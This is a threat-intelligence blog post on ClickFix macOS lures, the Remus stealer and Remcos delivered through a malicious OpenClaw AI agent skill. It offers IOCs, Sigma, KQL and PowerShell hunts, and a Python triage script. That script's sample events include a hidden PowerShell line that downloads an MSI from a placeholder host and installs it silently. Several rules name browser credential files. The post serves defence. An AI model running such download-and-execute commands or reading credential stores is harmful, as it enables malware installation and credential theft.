ClickFix macOS Lures, Remus Stealer, & OpenClaw RAT Supply Chain: OTX Pulse Analysis

Security Arsenal Team
May 9, 2026
5 min read

Current OTX pulses indicate a convergence of sophisticated delivery mechanisms and evasive infostealers. Threat actors are actively leveraging ClickFix social engineering tactics against macOS users, utilizing fake troubleshooting blogs to distribute payloads like Macsync, Shub Stealer, and AMOS via malicious Terminal commands.

Simultaneously, the Windows ecosystem faces a dual threat: the evolution of Lumma Stealer into Remus, a 64-bit variant capable of bypassing browser Application-Bound Encryption, and the weaponization of the OpenClaw AI framework. The "DeepSeek-Claw" skill is being used to distribute Remcos RAT and GhostLoader through a supply chain attack involving a legitimate, signed GoToMeeting MSI installer that sideloads malicious DLLs.

Collectively, these campaigns aim at credential harvesting, cryptocurrency wallet theft, and establishing persistent remote access.

Threat Actor / Malware Profile

1. ClickFix Campaign (macOS)

  • Malware Families: Macsync, Shub Stealer, AMOS, PhantomPulse.
  • Distribution Method: SEO poisoning on blog sites offering fake macOS utilities. Victims are tricked into running curl/wget commands in Terminal.
  • Behavior: Exfiltration of system data and browser cookies.

2. Remus Stealer (Windows)

  • Lineage: Evolution of Lumma Stealer (v5 successor).
  • Capabilities: Bypasses Application-Bound Encryption (ABE) in Chrome/Edge to steal cookies and passwords. Uses innovative process injection and Etherhiding techniques.
  • C2: Utilizes Ethereum blockchain for C2 communication in some variants.

3. OpenClaw / Remcos RAT (Windows)

  • Distribution Method: Malicious "DeepSeek-Claw" skill within the OpenClaw AI agent framework.
  • Payload Chain: PowerShell command -> Downloads malicious MSI -> Legitimate signed GoToMeeting binary (G2MViewer.exe) -> Sideloads malicious DLL (Remcos/GhostLoader).
  • Behavior: Remote Access Trojan (RAT) capabilities, keylogging, and loader execution.

IOC Analysis

  • Domains (C2/Distribution): A mix of newly registered domains and compromised infrastructure. Key indicators include dropras.xyz and trackpipe.dev (OpenClaw/Remcos), and jihiz.com, kayeart.com (ClickFix).
  • IPv4 (C2): Hardcoded IPs such as 45.94.47.204 (ClickFix) and 217.156.122.0/24 range (Remus).
  • File Hashes (MD5/SHA1): Specific MD5 hashes provided for the malicious MSI packages and associated payloads (e.g., 1c267cab0a800a7b2d598bc1b112d5ce).

Operational Guidance: SOC teams should immediately block the listed domains and IPs at the perimeter firewall and proxy. The file hashes should be loaded into EDR detection engines for immediate scanning. The PowerShell commands used in the OpenClaw attack often involve msiexec or Invoke-WebRequest downloading from non-standard TLDs.
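As an added example (not code from the OTX pulses or the original post), the following Python applies the guidance above to constructed endpoint events: it flags PowerShell command lines that call msiexec or Invoke-WebRequest against a URL on a TLD outside an assumed allowlist, and G2MViewer.exe loading a DLL from outside a GoToMeeting install directory. The TLD allowlist, the event field names and the sample hostnames and paths are assumptions, not page indicators.

```python
import re
from typing import Dict, List

# TLDs treated as "standard"; the post does not enumerate them, so this allowlist is an assumption.
COMMON_TLDS = {"com", "net", "org", "edu", "gov", "io"}
DOWNLOADERS = ("msiexec", "invoke-webrequest", "iwr ", "curl", "wget")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

def suspicious_download(cmdline: str) -> List[str]:
    """Hosts fetched by a downloader in this command line whose TLD is outside the allowlist."""
    lowered = cmdline.lower()
    if not any(tool in lowered for tool in DOWNLOADERS):
        return []
    hosts = [h.lower().rstrip(".") for h in URL_RE.findall(cmdline)]
    return [h for h in hosts if h.rsplit(".", 1)[-1] not in COMMON_TLDS]

def gotomeeting_sideload(event: Dict[str, str]) -> bool:
    """True when G2MViewer.exe loads a DLL from outside a GoToMeeting install directory."""
    image = event.get("Image", "").lower()
    loaded = event.get("ImageLoaded", "").lower()
    if not image.endswith("\\g2mviewer.exe") or not loaded.endswith(".dll"):
        return False
    return "\\gotomeeting\\" not in loaded

def triage(events: List[Dict[str, str]]) -> list:
    """Return (rule, device, detail) alerts for the OpenClaw/Remcos delivery chain."""
    alerts = []
    for ev in events:
        if ev["EventType"] == "process_creation":
            involved = (ev.get("Image", "") + ev.get("ParentImage", "")).lower()
            hosts = suspicious_download(ev.get("CommandLine", ""))
            if hosts and "powershell.exe" in involved:
                alerts.append(("openclaw_download", ev["DeviceName"], ",".join(hosts)))
        elif ev["EventType"] == "image_load" and gotomeeting_sideload(ev):
            alerts.append(("g2m_sideload", ev["DeviceName"], ev["ImageLoaded"]))
    return alerts

# Constructed sample events; hostnames and paths are placeholders, not indicators from the pulses.
SAMPLE_EVENTS = [
    {"EventType": "process_creation", "DeviceName": "WS01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Tools\openclaw\agent.exe",
     "CommandLine": r"powershell -w hidden -c Invoke-WebRequest https://lure-example.xyz/u.msi -OutFile $env:TEMP\u.msi; msiexec /i $env:TEMP\u.msi /qn"},
    {"EventType": "process_creation", "DeviceName": "WS02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -c Invoke-WebRequest https://www.microsoft.com/tool.msi -OutFile tool.msi"},
    {"EventType": "image_load", "DeviceName": "WS01", "Image": r"C:\Users\u\AppData\Local\Temp\G2MViewer.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Local\Temp\G2M.dll"},
    {"EventType": "image_load", "DeviceName": "WS03", "Image": r"C:\Program Files (x86)\GoToMeeting\12345\G2MViewer.exe",
     "ImageLoaded": r"C:\Program Files (x86)\GoToMeeting\12345\G2M.dll"},
]
```

Running `triage(SAMPLE_EVENTS)` yields one download alert for WS01 and one sideload alert for WS01; the benign Microsoft download and the in-place GoToMeeting DLL load produce nothing.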

Detection Engineering

YAML
title: Suspicious macOS Terminal Downloading Executables (ClickFix)
id: 8a7b6c5d-4e3f-2a1b-9c8d-7e6f5a4b3c2d
description: Detects macOS Terminal processes attempting to download payloads via curl or wget, indicative of ClickFix social engineering.
status: experimental
date: 2026/05/10
author: Security Arsenal
references:
    - https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: macos
detection:
    selection_terminal:
        # curl/wget typed into Terminal run under the user's shell, so match the shell
        # (or Terminal itself for direct launches) as the parent; the downloader is the Image
        ParentImage|endswith:
            - '/Terminal.app/Contents/MacOS/Terminal'
            - '/zsh'
            - '/bash'
            - '/sh'
    selection_tools:
        Image|endswith:
            - '/curl'
            - '/wget'
    selection_suspicious_args:
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: all of selection_*
falsepositives:
    - Legitimate software installation via command line
level: high

---
title: Remcos RAT Sideload via GoToMeeting Installer
id: 9b8c7d6e-5f4a-3b2c-0d9e-8f7a6b5c4d3e
description: Detects the execution of the signed GoToMeeting binary (G2MViewer.exe) loading a malicious DLL from a non-standard path, associated with OpenClaw/Remcos campaigns.
status: experimental
date: 2026/05/10
author: Security Arsenal
references:
    - https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader
tags:
    - attack.defense_evasion
    - attack.t1574.002
logsource:
    category: image_load
    product: windows
detection:
    selection_sideload:
        Image|endswith: '\G2MViewer.exe'
    selection_dll:
        ImageLoaded|contains:
            - '\AppData\Local\Temp'
            - '\Downloads'
        ImageLoaded|endswith:
            - '.dll'
    filter_legit:
        Signed: 'true'
        ImageLoaded|contains:
            - '\Program Files (x86)\GoToMeeting'
            - '\Program Files\GoToMeeting'
    condition: selection_sideload and selection_dll and not filter_legit
falsepositives:
    - Rare; legitimate GoToMeeting loads DLLs from install directory
level: critical

---
title: Potential Remus Stealer Browser Data Access
id: 0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f
description: Detects processes accessing browser 'Local State' or 'Login Data' files, a behavior consistent with Remus/Lumma Stealer bypassing encryption protections.
status: experimental
date: 2026/05/10
author: Security Arsenal
references:
    - https://cyberpress.org/remus-bypasses-browser-encryption/
tags:
    - attack.credential_access
    - attack.t1555.003
logsource:
    category: file_access
    product: windows
detection:
    selection_target:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Local State'
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\Microsoft\Edge\User Data\Local State'
            - '\Microsoft\Edge\User Data\Default\Login Data'
    exclusion_browsers:
        Image|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\brave.exe'
    condition: selection_target and not exclusion_browsers
falsepositives:
    - Legitimate password managers or backup utilities
level: high


kql
// Hunt for connections to known malicious IPs and domains from OTX Pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("jihiz.com", "kayeart.com", "bintail.com", "wusetail.com", "malext.com", "miappl.com", "pla7ina.cfd", "dropras.xyz", "trackpipe.dev")
   or RemoteIP in ("45.94.47.204", "217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| extend ThreatIntel = "OTX ClickFix/Remus/OpenClaw"


powershell
# Hunt script for OpenClaw/Remcos associated File Hashes and Persistence
# Indicators from the OTX pulses: 32-hex-char entries are MD5, the 40-hex-char entry is SHA1
$maliciousHashes = @(
    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373",
    "470c3803bd5a4770eb5470a84a831f187f591c64"
)

# Split indicators by digest length so each is compared with the matching algorithm
$md5List  = @($maliciousHashes | Where-Object { $_.Length -eq 32 })
$sha1List = @($maliciousHashes | Where-Object { $_.Length -eq 40 })

Write-Host "[+] Scanning for known malicious OpenClaw/Remcos file hashes..."

# Walk the drive once and hash each file once per algorithm, not once per indicator
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
    $file = $_
    if ($md5List.Count -gt 0) {
        $md5 = (Get-FileHash -LiteralPath $file.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($md5 -and ($md5List -contains $md5)) {
            Write-Host "[!] THREAT DETECTED (MD5): Malicious file found at $($file.FullName)" -ForegroundColor Red
        }
    }
    if ($sha1List.Count -gt 0) {
        $sha1 = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA1 -ErrorAction SilentlyContinue).Hash
        if ($sha1 -and ($sha1List -contains $sha1)) {
            Write-Host "[!] THREAT DETECTED (SHA1): Malicious file found at $($file.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for suspicious persistence mechanisms..."
$regPaths = @("HKCU:\Software\Microsoft\Windows\CurrentVersion\Run", "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run")
foreach ($path in $regPaths) {
    if (-not (Test-Path $path)) { continue }
    # Inspect the data of each Run value, skipping the PS* metadata properties Get-ItemProperty adds
    (Get-ItemProperty -Path $path).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and "$($_.Value)" -match 'G2M|dropras' } |
        ForEach-Object {
            Write-Host "[!] SUSPICIOUS PERSISTENCE found in $path : $($_.Name) = $($_.Value)" -ForegroundColor Yellow
        }
}

Response Priorities

  • Immediate: Block all IOCs (Domains and IPs) at the network edge. Isolate endpoints exhibiting PowerShell processes spawning msiexec.exe, or G2MViewer.exe loading unsigned DLLs from outside its install directory.
  • 24h: Conduct a credential audit for users who may have interacted with the "DeepSeek-Claw" skill or visited the fake macOS utility blogs. Reset browser tokens/sessions due to the Remus encryption bypass capability.
  • 1 Week: Review and restrict the usage of unsanctioned AI agent frameworks and external code execution tools. Implement application control policies to prevent the execution of unsigned binaries masquerading as utilities.
